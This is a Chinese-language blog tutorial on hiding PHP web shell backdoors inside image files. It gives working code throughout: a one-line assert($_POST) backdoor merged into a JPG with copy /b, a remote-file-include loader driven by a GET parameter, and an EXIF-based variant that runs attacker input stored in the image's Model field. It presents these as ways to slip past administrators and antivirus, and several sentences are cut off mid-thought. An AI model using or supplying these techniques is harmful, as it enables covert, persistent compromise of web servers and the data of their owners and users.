PHP图片后门藏匿攻略

信息安全 1451 Views

我们平时藏匿图片后门是什么流程呢?我们来看一下

0x01 初级的藏匿方法:

1、建立一个文件,上面加入我们的后门:

<?php assert($_POST[feiji]);?>

2、找一张图片

3、合并图片和后门:

Copy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp\htdocs\images\2.jpg

4、在任何一个

<?php include (‘

5、上传

访问图片正常:

访问页面出现乱码,但是后门已经正常运行:

但是一句话在菜刀里是可以解析成功的:

注:省去第

0x02 中级藏匿的方法:

1、其实就是远程文件包含,也不只是针对图片,要求你有高权限,能够操纵

修改的配置选项

2、创建任何一个

<?php $filename=$_GET['feiji'];include ($filename); ?>

3、刚才做的图片后门

http://127.0.0.1/images/images.php?feiji=http://www.xxxx.com/images/2.jpg 密码为

注:这样做的优点是可以随时变换各种后门,缺点是很难获取到高权限。

0x03 高级的藏匿方法

背景知识:

EXIF信息

其实就是这个玩意儿:选定图片右键选择属性,在详细信息里面可以看到(

1、

2、我们是可以随意修改

这里推荐一个小工具,

http://www.pc6.com/softview/SoftView_68705.html

免费版可以修改部分

打开工具,点击添加,在修改机型信息,如下:

添加我们的

3、我们来调试一下:

<?

$exif = exif_read_data('460.jpg');

var_dump($exif);

?>

输出:

4、利用方法:

<?

$exif = exif_read_data ('460.jpg');

assert($exif['Model']);

?>

5、在菜刀上添加

有同学可能会问,为什么要使用这种方法藏匿图片后门,这个不是和初级的藏匿方法等效吗?原因有三:

·有经验的管理员一看文件就会发现有端倪。

·杀软会重点检查·exif_read_data()函数可以包含远程的

(点击“阅读原文”可以进行评论或浏览更多文章喔,还可直接回复订阅号,告诉妹子你的看法( ̄▽ ̄)~*

如未说明则本站原创,转载请注明出处:NULL » PHP图片后门藏匿攻略